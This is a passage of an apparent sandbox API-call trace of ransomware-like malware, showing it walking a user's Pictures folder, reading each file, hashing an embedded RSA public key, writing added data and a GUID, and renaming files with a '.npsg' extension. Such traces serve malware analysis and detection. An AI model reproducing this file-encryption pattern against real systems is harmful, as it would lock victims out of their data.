| out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.386] GetLastError () returned 0x0 [0239.386] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.386] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.386] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.386] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.386] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.386] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.387] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x6ef1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.387] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0239.387] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.387] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.387] CloseHandle (hObject=0x644) returned 1 [0239.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e560 [0239.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x3b89cd0 [0239.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e560 | out: hHeap=0x620000) returned 1 [0239.389] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\1Jb4drQ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\1jb4drq.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\1Jb4drQ.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\1jb4drq.png.npsg")) returned 1 [0239.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89cd0 | out: hHeap=0x620000) returned 1 [0239.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.390] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x70df58 | out: hHeap=0x620000) returned 1 [0239.391] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2afaede0, ftCreationTime.dwHighDateTime=0x1d5bd7c, ftLastAccessTime.dwLowDateTime=0x196fbd40, ftLastAccessTime.dwHighDateTime=0x1d5c3e8, ftLastWriteTime.dwLowDateTime=0x196fbd40, ftLastWriteTime.dwHighDateTime=0x1d5c3e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bH_TctCtrR.bmp", cAlternateFileName="BH_TCT~1.BMP")) returned 1 [0239.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c4528 [0239.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x70df58 [0239.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4528 | out: hHeap=0x620000) returned 1 [0239.391] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\bH_TctCtrR.bmp") returned=".bmp" [0239.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\NkpM1m8S\\PzoYP\\bH_TctCtrR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nkpm1m8s\\pzoyp\\bh_tctctrr.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.391] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=81536) returned 1 [0239.391] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.394] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x13e5a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.394] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.395] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0239.395] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x13e80, lpOverlapped=0x0) returned 1 [0239.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.396] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.396] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.397] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.397] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.397] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.397] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.397] GetLastError () returned 0x0 [0239.397] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.397] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0239.398] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.398] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.398] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x13e80) returned 0x3b95d50 [0239.398] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0239.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b86870 [0239.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d00 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b868b8 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d60 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d48 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88da8 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0239.399] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0239.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88da8 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88d48 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0239.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.400] GetCurrentThreadId () returned 0x5b4 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b882d8 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a6e8 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.400] GetCurrentThreadId () returned 0x5b4 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x340dd38 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d78 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d48 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373538 [0239.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0239.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88da8 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d18 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dc0 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d30 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88d90 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88dd8 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d90 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d30 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88d48 [0239.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d78 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dd8 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d48 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b94a10 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0239.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3b94c18 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a6e8 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94c18 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94a10 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0239.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d90 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88dc0 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88da8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d18 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88d60 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b868b8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0239.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 